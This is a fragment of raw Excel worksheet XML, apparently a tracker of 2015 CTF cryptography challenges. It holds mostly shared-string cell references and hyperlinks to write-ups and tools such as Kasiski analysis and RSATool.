      <c r="A219" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B219" s="31">
        <v>2015.0</v>
      </c>
      <c r="C219" s="30" t="s">
        <v>1979</v>
      </c>
      <c r="D219" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E219" s="30" t="s">
        <v>766</v>
      </c>
      <c r="F219" s="30" t="s">
        <v>1981</v>
      </c>
      <c r="G219" s="30"/>
      <c r="H219" s="33" t="s">
        <v>1984</v>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B220" s="31">
        <v>2015.0</v>
      </c>
      <c r="C220" s="30" t="s">
        <v>1986</v>
      </c>
      <c r="D220" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E220" s="30" t="s">
        <v>1570</v>
      </c>
      <c r="F220" s="30" t="s">
        <v>1987</v>
      </c>
      <c r="G220" s="30"/>
      <c r="H220" s="30"/>
    </row>
    <row r="221">
      <c r="A221" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B221" s="31">
        <v>2015.0</v>
      </c>
      <c r="C221" s="30" t="s">
        <v>1989</v>
      </c>
      <c r="D221" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E221" s="30" t="s">
        <v>1990</v>
      </c>
      <c r="F221" s="30" t="s">
        <v>1991</v>
      </c>
      <c r="G221" s="30"/>
      <c r="H221" s="30"/>
    </row>
    <row r="222">
      <c r="A222" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B222" s="31">
        <v>2015.0</v>
      </c>
      <c r="C222" s="30" t="s">
        <v>1992</v>
      </c>
      <c r="D222" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E222" s="30" t="s">
        <v>826</v>
      </c>
      <c r="F222" s="30" t="s">
        <v>1993</v>
      </c>
      <c r="G222" s="30"/>
      <c r="H222" s="30"/>
    </row>
    <row r="223">
      <c r="A223" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B223" s="43">
        <v>2015.0</v>
      </c>
      <c r="C223" s="5" t="s">
        <v>1994</v>
      </c>
      <c r="D223" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E223" s="5" t="s">
        <v>1055</v>
      </c>
      <c r="F223" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G223" s="3"/>
    </row>
    <row r="224">
      <c r="A224" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B224" s="43">
        <v>2015.0</v>
      </c>
      <c r="C224" s="5" t="s">
        <v>1995</v>
      </c>
      <c r="D224" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E224" s="5" t="s">
        <v>1055</v>
      </c>
      <c r="F224" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G224" s="3"/>
    </row>
    <row r="225">
      <c r="A225" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B225" s="43">
        <v>2015.0</v>
      </c>
      <c r="C225" s="5" t="s">
        <v>1996</v>
      </c>
      <c r="D225" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E225" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F225" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G225" s="3"/>
    </row>
    <row r="226">
      <c r="A226" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B226" s="43">
        <v>2015.0</v>
      </c>
      <c r="C226" s="5" t="s">
        <v>1837</v>
      </c>
      <c r="D226" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E226" s="5" t="s">
        <v>1998</v>
      </c>
      <c r="F226" s="5" t="s">
        <v>1999</v>
      </c>
      <c r="G226" s="3"/>
    </row>
    <row r="227">
      <c r="A227" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B227" s="43">
        <v>2015.0</v>
      </c>
      <c r="C227" s="5" t="s">
        <v>2000</v>
      </c>
      <c r="D227" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E227" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F227" s="5" t="s">
        <v>2003</v>
      </c>
      <c r="G227" s="56" t="s">
        <v>2004</v>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B228" s="43">
        <v>2015.0</v>
      </c>
      <c r="C228" s="5" t="s">
        <v>2008</v>
      </c>
      <c r="D228" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E228" s="5" t="s">
        <v>1538</v>
      </c>
      <c r="F228" s="5" t="s">
        <v>2010</v>
      </c>
      <c r="G228" s="56" t="s">
        <v>2012</v>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B229" s="43">
        <v>2015.0</v>
      </c>
      <c r="C229" s="5" t="s">
        <v>2013</v>
      </c>
      <c r="D229" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E229" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F229" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G229" s="5" t="s">
        <v>2014</v>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B230" s="43">
        <v>2015.0</v>
      </c>
      <c r="C230" s="5" t="s">
        <v>2015</v>
      </c>
      <c r="D230" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E230" s="5" t="s">
        <v>1538</v>
      </c>
      <c r="F230" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G230" s="3"/>
    </row>
    <row r="231">
      <c r="A231" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B231" s="43">
        <v>2015.0</v>
      </c>
      <c r="C231" s="5" t="s">
        <v>2016</v>
      </c>
      <c r="D231" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E231" s="5" t="s">
        <v>2017</v>
      </c>
      <c r="F231" s="5" t="s">
        <v>2019</v>
      </c>
      <c r="G231" s="3"/>
    </row>
    <row r="232">
      <c r="A232" s="5" t="s">
        <v>2020</v>
      </c>
      <c r="B232" s="43">
        <v>2015.0</v>
      </c>
      <c r="C232" s="5" t="s">
        <v>2021</v>
      </c>
      <c r="D232" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E232" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F232" s="5" t="s">
        <v>2023</v>
      </c>
      <c r="G232" s="3"/>
    </row>
    <row r="233">
      <c r="A233" s="5" t="s">
        <v>2020</v>
      </c>
      <c r="B233" s="43">
        <v>2015.0</v>
      </c>
      <c r="C233" s="5" t="s">
        <v>2025</v>
      </c>
      <c r="D233" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E233" s="5" t="s">
        <v>1088</v>
      </c>
      <c r="F233" s="5" t="s">
        <v>1650</v>
      </c>
      <c r="G233" s="56" t="s">
        <v>2026</v>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="s">
        <v>2020</v>
      </c>
      <c r="B234" s="43">
        <v>2015.0</v>
      </c>
      <c r="C234" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="D234" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E234" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F234" s="5" t="s">
        <v>2031</v>
      </c>
      <c r="G234" s="3"/>
    </row>
    <row r="235">
      <c r="A235" s="5" t="s">
        <v>2020</v>
      </c>
      <c r="B235" s="43">
        <v>2015.0</v>
      </c>
      <c r="C235" s="5" t="s">
        <v>2033</v>
      </c>
      <c r="D235" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E235" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F235" s="5" t="s">
        <v>2035</v>
      </c>
      <c r="G235" s="3"/>
    </row>
    <row r="236">
      <c r="A236" s="5" t="s">
        <v>2020</v>
      </c>
      <c r="B236" s="43">
        <v>2105.0</v>
      </c>
      <c r="C236" s="5" t="s">
        <v>2037</v>
      </c>
      <c r="D236" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E236" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F236" s="5" t="s">
        <v>2038</v>
      </c>
      <c r="G236" s="3"/>
    </row>
    <row r="237">
      <c r="A237" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B237" s="43">
        <v>2015.0</v>
      </c>
      <c r="C237" s="5" t="s">
        <v>2039</v>
      </c>
      <c r="D237" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E237" s="5" t="s">
        <v>2040</v>
      </c>
      <c r="F237" s="5" t="s">
        <v>2042</v>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B238" s="43">
        <v>2015.0</v>
      </c>
      <c r="C238" s="5" t="s">
        <v>2043</v>
      </c>
      <c r="D238" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E238" s="5" t="s">
        <v>2040</v>
      </c>
      <c r="F238" s="5" t="s">
        <v>2046</v>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="30" t="s">
        <v>2047</v>
      </c>
      <c r="B239" s="31">
        <v>2015.0</v>
      </c>
      <c r="C239" s="30" t="s">
        <v>2048</v>
      </c>
      <c r="D239" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E239" s="30" t="s">
        <v>2049</v>
      </c>
      <c r="F239" s="30" t="s">
        <v>2050</v>
      </c>
      <c r="G239" s="30"/>
      <c r="H239" s="30"/>
      <c r="I239" s="30"/>
    </row>
    <row r="240">
      <c r="A240" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B240" s="31">
        <v>2015.0</v>
      </c>
      <c r="C240" s="30" t="s">
        <v>2052</v>
      </c>
      <c r="D240" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E240" s="30" t="s">
        <v>2053</v>
      </c>
      <c r="F240" s="30" t="s">
        <v>2055</v>
      </c>
      <c r="G240" s="30"/>
      <c r="H240" s="30"/>
      <c r="I240" s="30"/>
    </row>
    <row r="241">
      <c r="A241" s="17">
        <v>42577.0</v>
      </c>
      <c r="B241" s="65"/>
      <c r="C241" s="65"/>
      <c r="D241" s="65"/>
      <c r="E241" s="9"/>
      <c r="F241" s="65"/>
      <c r="G241" s="65"/>
      <c r="H241" s="66"/>
      <c r="I241" s="9"/>
      <c r="J241" s="9"/>
      <c r="K241" s="9"/>
      <c r="L241" s="9"/>
      <c r="M241" s="9"/>
      <c r="N241" s="9"/>
      <c r="O241" s="9"/>
      <c r="P241" s="9"/>
      <c r="Q241" s="9"/>
      <c r="R241" s="9"/>
      <c r="S241" s="9"/>
      <c r="T241" s="9"/>
      <c r="U241" s="9"/>
      <c r="V241" s="9"/>
      <c r="W241" s="9"/>
      <c r="X241" s="9"/>
      <c r="Y241" s="9"/>
      <c r="Z241" s="9"/>
    </row>
    <row r="242">
      <c r="A242" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B242" s="31">
        <v>2015.0</v>
      </c>
      <c r="C242" s="31">
        <v>11.0</v>
      </c>
      <c r="D242" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E242" s="30" t="s">
        <v>2058</v>
      </c>
      <c r="F242" s="30" t="s">
        <v>2059</v>
      </c>
      <c r="G242" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B243" s="31">
        <v>2015.0</v>
      </c>
      <c r="C243" s="30" t="s">
        <v>2060</v>
      </c>
      <c r="D243" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E243" s="30" t="s">
        <v>1538</v>
      </c>
      <c r="F243" s="30" t="s">
        <v>2061</v>
      </c>
      <c r="G243" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B244" s="31">
        <v>2015.0</v>
      </c>
      <c r="C244" s="30" t="s">
        <v>2062</v>
      </c>
      <c r="D244" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E244" s="30" t="s">
        <v>716</v>
      </c>
      <c r="F244" s="30" t="s">
        <v>2063</v>
      </c>
      <c r="G244" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B245" s="31">
        <v>2015.0</v>
      </c>
      <c r="C245" s="30" t="s">
        <v>2065</v>
      </c>
      <c r="D245" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E245" s="30" t="s">
        <v>2066</v>
      </c>
      <c r="F245" s="30" t="s">
        <v>2067</v>
      </c>
      <c r="G245" s="30" t="s">
        <v>2068</v>
      </c>
      <c r="H245" s="30"/>
    </row>
    <row r="246">
      <c r="A246" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B246" s="31">
        <v>2015.0</v>
      </c>
      <c r="C246" s="30" t="s">
        <v>2069</v>
      </c>
      <c r="D246" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E246" s="30" t="s">
        <v>2066</v>
      </c>
      <c r="F246" s="30" t="s">
        <v>2071</v>
      </c>
      <c r="G246" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H246" s="30"/>
    </row>
    <row r="247">
      <c r="A247" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B247" s="31">
        <v>2015.0</v>
      </c>
      <c r="C247" s="30" t="s">
        <v>2074</v>
      </c>
      <c r="D247" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E247" s="30" t="s">
        <v>2066</v>
      </c>
      <c r="F247" s="30" t="s">
        <v>2076</v>
      </c>
      <c r="G247" s="33" t="str">
        <f>HYPERLINK("http://crypto.interactive-maths.com/kasiski-analysis-breaking-the-code.html","Kasiski Analysis ")</f>
        <v>Kasiski Analysis </v>
      </c>
      <c r="H247" s="30"/>
    </row>
    <row r="248">
      <c r="A248" s="30" t="s">
        <v>1588</v>
      </c>
      <c r="B248" s="31">
        <v>2015.0</v>
      </c>
      <c r="C248" s="30" t="s">
        <v>2082</v>
      </c>
      <c r="D248" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E248" s="30" t="s">
        <v>872</v>
      </c>
      <c r="F248" s="30" t="s">
        <v>2083</v>
      </c>
      <c r="G248" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H248" s="30"/>
    </row>
    <row r="249">
      <c r="A249" s="30" t="s">
        <v>1588</v>
      </c>
      <c r="B249" s="31">
        <v>2015.0</v>
      </c>
      <c r="C249" s="30" t="s">
        <v>2084</v>
      </c>
      <c r="D249" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E249" s="30" t="s">
        <v>872</v>
      </c>
      <c r="F249" s="144" t="s">
        <v>2085</v>
      </c>
      <c r="G249" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H249" s="30"/>
    </row>
    <row r="250">
      <c r="A250" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B250" s="31">
        <v>2015.0</v>
      </c>
      <c r="C250" s="30" t="s">
        <v>2086</v>
      </c>
      <c r="D250" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E250" s="30" t="s">
        <v>2087</v>
      </c>
      <c r="F250" s="30" t="s">
        <v>2088</v>
      </c>
      <c r="G250" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H250" s="30"/>
      <c r="I250" s="30"/>
    </row>
    <row r="251">
      <c r="A251" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B251" s="31">
        <v>2015.0</v>
      </c>
      <c r="C251" s="30" t="s">
        <v>2089</v>
      </c>
      <c r="D251" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E251" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F251" s="30" t="s">
        <v>2090</v>
      </c>
      <c r="G251" s="33" t="str">
        <f>HYPERLINK("https://github.com/ius/rsatool","RSATool")</f>
        <v>RSATool</v>
      </c>
      <c r="H251" s="30"/>
      <c r="I251" s="30"/>
    </row>
    <row r="252">
      <c r="A252" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B252" s="31">
        <v>2015.0</v>
      </c>
      <c r="C252" s="30" t="s">
        <v>2094</v>
      </c>
      <c r="D252" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E252" s="35" t="s">
        <v>826</v>
      </c>
      <c r="F252" s="30" t="s">
        <v>2095</v>
      </c>
      <c r="G252" s="33" t="str">
        <f>HYPERLINK("http://stackoverflow.com/questions/13663604/questions-about-the-nacl-crypto-library/13663945#13663945","How Does Crypto_Box work?")</f>
        <v>How Does Crypto_Box work?</v>
      </c>
      <c r="H252" s="30"/>
      <c r="I252" s="30"/>
    </row>
    <row r="253">
      <c r="A253" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B253" s="31">
        <v>2015.0</v>
      </c>
      <c r="C253" s="30" t="s">
        <v>2096</v>
      </c>
      <c r="D253" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E253" s="30" t="s">
        <v>2087</v>
      </c>
      <c r="F253" s="30" t="s">
        <v>2097</v>
      </c>
      <c r="G253" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H253" s="30"/>
    </row>
    <row r="254">
      <c r="A254" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B254" s="31">
        <v>2015.0</v>
      </c>
      <c r="C254" s="30" t="s">
        <v>2098</v>
      </c>
      <c r="D254" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E254" s="30" t="s">
        <v>2099</v>
      </c>
      <c r="F254" s="30" t="s">
        <v>2100</v>
      </c>
      <c r="G254" s="30" t="s">
        <v>1728</v>
      </c>
      <c r="H254" s="30"/>
    </row>
    <row r="255">
      <c r="A255" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B255" s="31">
        <v>2015.0</v>
      </c>
      <c r="C255" s="30" t="s">
        <v>2101</v>
      </c>
      <c r="D255" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E255" s="30" t="s">
        <v>1538</v>
      </c>
      <c r="F255" s="30" t="s">
        <v>2102</v>
      </c>
      <c r="G255" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H255" s="30"/>
    </row>
    <row r="256">
      <c r="A256" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B256" s="31">
        <v>2015.0</v>
      </c>
      <c r="C256" s="30" t="s">
        <v>2103</v>
      </c>
      <c r="D256" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E256" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F256" s="30" t="s">
        <v>2104</v>
      </c>
      <c r="G256" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H256" s="30"/>
    </row>
    <row r="257">
      <c r="A257" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B257" s="31">
        <v>2015.0</v>
      </c>
      <c r="C257" s="30" t="s">
        <v>2105</v>
      </c>
      <c r="D257" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E257" s="30" t="s">
        <v>2106</v>
      </c>
      <c r="F257" s="30" t="s">
        <v>2107</v>
      </c>
      <c r="G257" s="30" t="s">
        <v>2108</v>
      </c>
      <c r="H257" s="30"/>
    </row>
    <row r="258">
      <c r="A258" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B258" s="31">
        <v>2015.0</v>
      </c>
      <c r="C258" s="30" t="s">
        <v>2109</v>
      </c>
      <c r="D258" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E258" s="30" t="s">
        <v>1736</v>
      </c>
      <c r="F258" s="30" t="s">
        <v>2110</v>
      </c>
      <c r="G258" s="33" t="str">
        <f>HYPERLINK("http://symbolhound.com/","Symbol Hound")</f>
        <v>Symbol Hound</v>
      </c>
      <c r="H258" s="33" t="str">
        <f>HYPERLINK("http://web.archive.org/web/20140209124110/http://www.virtualconspiracy.com/download/scrdec18.c","Script")</f>
        <v>Script</v>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B259" s="31">
        <v>2015.0</v>
      </c>
      <c r="C259" s="30" t="s">
        <v>2111</v>
      </c>
      <c r="D259" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E259" s="30" t="s">
        <v>2112</v>
      </c>
      <c r="F259" s="30" t="s">
        <v>2113</v>
      </c>
      <c r="G259" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life","Conway's Game of Life")</f>
        <v>Conway's Game of Life</v>
      </c>
      <c r="H259" s="33" t="str">
        <f>HYPERLINK("https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/NUITDUHACK/crypto/gameoflife/solution/gameoflifesolution.py","script")</f>
        <v>script</v>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B260" s="31">
        <v>2015.0</v>
      </c>
      <c r="C260" s="30" t="s">
        <v>2118</v>
      </c>
      <c r="D260" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E260" s="30" t="s">
        <v>2120</v>
      </c>
      <c r="F260" s="30" t="s">
        <v>2121</v>
      </c>
      <c r="G260" s="33" t="str">
        <f>HYPERLINK("http://tasteless.eu/post/2015/04/ndh-2015-quals-weshgrow/"," writeup and script")</f>
        <v> writeup and script</v>
      </c>
      <c r="H260" s="30"/>
    </row>
    <row r="261">
      <c r="A261" s="30" t="s">
        <v>2131</v>
      </c>
      <c r="B261" s="31">
        <v>2015.0</v>
      </c>
      <c r="C261" s="30" t="s">
        <v>208</v>
      </c>
      <c r="D261" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E261" s="35" t="s">
        <v>1055</v>
      </c>
      <c r="F261" s="30" t="s">
        <v>2134</v>
      </c>
      <c r="G261" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="30" t="s">
        <v>2136</v>
      </c>
      <c r="B262" s="31">
        <v>2015.0</v>
      </c>
      <c r="C262" s="30" t="s">
        <v>1143</v>
      </c>
      <c r="D262" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E262" s="35" t="s">
        <v>1055</v>
      </c>
      <c r="F262" s="30" t="s">
        <v>2138</v>
      </c>
      <c r="G262" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2015/tree/master/whitehat-contest-10/crypto/crypto100","Writeup and script")</f>
        <v>Writeup and script</v>
      </c>
      <c r="H262" s="30"/>
      <c r="I262" s="30"/>
    </row>
    <row r="263">
      <c r="A263" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B263" s="31">
        <v>2015.0</v>
      </c>
      <c r="C263" s="30" t="s">
        <v>2139</v>
      </c>
      <c r="D263" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E263" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F263" s="35" t="s">
        <v>2140</v>
      </c>
      <c r="G263" s="30" t="s">
        <v>2141</v>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B264" s="43">
        <v>2015.0</v>
      </c>
      <c r="C264" s="5" t="s">
        <v>2143</v>
      </c>
      <c r="D264" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E264" s="5" t="s">
        <v>63</v>
      </c>
      <c r="F264" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G264" s="5" t="s">
        <v>2145</v>
      </c>
      <c r="H264" s="3"/>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="G40:H40"/>
    <mergeCell ref="G160:I160"/>
    <mergeCell ref="F161:H161"/>
    <mergeCell ref="F162:G162"/>
    <mergeCell ref="F163:G163"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="G5"/>
    <hyperlink r:id="rId2" ref="G6"/>
    <hyperlink r:id="rId3" ref="G7"/>
    <hyperlink r:id="rId4" ref="G14"/>
    <hyperlink r:id="rId5" ref="G16"/>
    <hyperlink r:id="rId6" ref="G22"/>
    <hyperlink r:id="rId7" ref="G35"/>
    <hyperlink r:id="rId8" ref="G36"/>
    <hyperlink r:id="rId9" ref="G56"/>
    <hyperlink r:id="rId10" ref="G61"/>
    <hyperlink r:id="rId11" ref="E62"/>
    <hyperlink r:id="rId12" ref="F62"/>
    <hyperlink r:id="rId13" ref="G71"/>
    <hyperlink r:id="rId14" ref="G78"/>
    <hyperlink r:id="rId15" ref="F79"/>
    <hyperlink r:id="rId16" ref="F82"/>
    <hyperlink r:id="rId17" ref="G84"/>
    <hyperlink r:id="rId18" ref="G85"/>
    <hyperlink r:id="rId19" ref="K89"/>
    <hyperlink r:id="rId20" ref="G100"/>
    <hyperlink r:id="rId21" ref="G101"/>
    <hyperlink r:id="rId22" ref="H101"/>
    <hyperlink r:id="rId23" ref="I101"/>
    <hyperlink r:id="rId24" ref="G104"/>
    <hyperlink r:id="rId25" ref="G117"/>
    <hyperlink r:id="rId26" ref="G124"/>
    <hyperlink r:id="rId27" ref="G127"/>
    <hyperlink r:id="rId28" location="H.C3.A5stad.27s_Broadcast_Attack" ref="G134"/>
    <hyperlink r:id="rId29" ref="E141"/>
    <hyperlink r:id="rId30" ref="G142"/>
    <hyperlink r:id="rId31" ref="E144"/>
    <hyperlink r:id="rId32" ref="G146"/>
    <hyperlink r:id="rId33" ref="G154"/>
    <hyperlink r:id="rId34" ref="G156"/>
    <hyperlink r:id="rId35" ref="G157"/>
    <hyperlink r:id="rId36" ref="G176"/>
    <hyperlink r:id="rId37" ref="G178"/>
    <hyperlink r:id="rId38" ref="G182"/>
    <hyperlink r:id="rId39" ref="H182"/>
    <hyperlink r:id="rId40" ref="I182"/>
    <hyperlink r:id="rId41" ref="E183"/>
    <hyperlink r:id="rId42" ref="G183"/>
    <hyperlink r:id="rId43" ref="G185"/>
    <hyperlink r:id="rId44" ref="G186"/>
    <hyperlink r:id="rId45" ref="G187"/>
    <hyperlink r:id="rId46" ref="H187"/>
    <hyperlink r:id="rId47" ref="I187"/>
    <hyperlink r:id="rId48" ref="J187"/>
    <hyperlink r:id="rId49" ref="G193"/>
    <hyperlink r:id="rId50" ref="F194"/>
    <hyperlink r:id="rId51" ref="G195"/>
    <hyperlink r:id="rId52" ref="F196"/>
    <hyperlink r:id="rId53" ref="G197"/>
    <hyperlink r:id="rId54" ref="H197"/>
    <hyperlink r:id="rId55" ref="G199"/>
    <hyperlink r:id="rId56" ref="G200"/>
    <hyperlink r:id="rId57" ref="G203"/>
    <hyperlink r:id="rId58" ref="G204"/>
    <hyperlink r:id="rId59" ref="G206"/>
    <hyperlink r:id="rId60" ref="G209"/>
    <hyperlink r:id="rId61" ref="F212"/>
    <hyperlink r:id="rId62" ref="F213"/>
    <hyperlink r:id="rId63" ref="H219"/>
    <hyperlink r:id="rId64" ref="G227"/>
    <hyperlink r:id="rId65" ref="G228"/>
    <hyperlink r:id="rId66" ref="G233"/>
    <hyperlink r:id="rId67" ref="G247"/>
    <hyperlink r:id="rId68" ref="G251"/>
    <hyperlink r:id="rId69" location="13663945" ref="G252"/>
    <hyperlink r:id="rId70" ref="G258"/>
    <hyperlink r:id="rId71" ref="H258"/>
    <hyperlink r:id="rId72" ref="G259"/>
    <hyperlink r:id="rId73" ref="H259"/>
    <hyperlink r:id="rId74" ref="G260"/>
    <hyperlink r:id="rId75" ref="G262"/>
  </hyperlinks>
  <drawing r:id="rId7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5.29"/>
    <col customWidth="1" min="3" max="3" width="22.29"/>
    <col customWidth="1" min="4" max="4" width="9.14"/>
    <col customWidth="1" min="5" max="5" width="17.43"/>
    <col customWidth="1" min="6" max="6" width="39.0"/>
    <col customWidth="1" min="7" max="7" width="35.29"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>6</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="6" t="s">
        <v>9</v>
      </c>
      <c r="B2" s="7"/>
      <c r="C2" s="6"/>
      <c r="D2" s="6"/>
      <c r="E2" s="6"/>
      <c r="F2" s="6"/>
      <c r="G2" s="6"/>
      <c r="H2" s="6"/>
      <c r="I2" s="8"/>
      <c r="J2" s="8"/>
      <c r="K2" s="9"/>
      <c r="L2" s="9"/>
      <c r="M2" s="9"/>
      <c r="N2" s="9"/>
      <c r="O2" s="9"/>
      <c r="P2" s="9"/>
      <c r="Q2" s="9"/>
      <c r="R2" s="9"/>
      <c r="S2" s="9"/>
      <c r="T2" s="9"/>
      <c r="U2" s="9"/>
      <c r="V2" s="9"/>
      <c r="W2" s="9"/>
      <c r="X2" s="9"/>
      <c r="Y2" s="9"/>
      <c r="Z2" s="9"/>
    </row>
    <row r="3">
      <c r="A3" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B3" s="11">
        <v>2016.0</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>1856</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>1857</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>1858</v>
      </c>
      <c r="G3" s="15" t="s">
        <v>1859</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B4" s="11">
        <v>2016.0</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>1860</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>407</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>342</v>
      </c>
      <c r="G4" s="14" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B5" s="11">
        <v>2016.0</v>
      </c>
      <c r="C5" s="2" t="s">
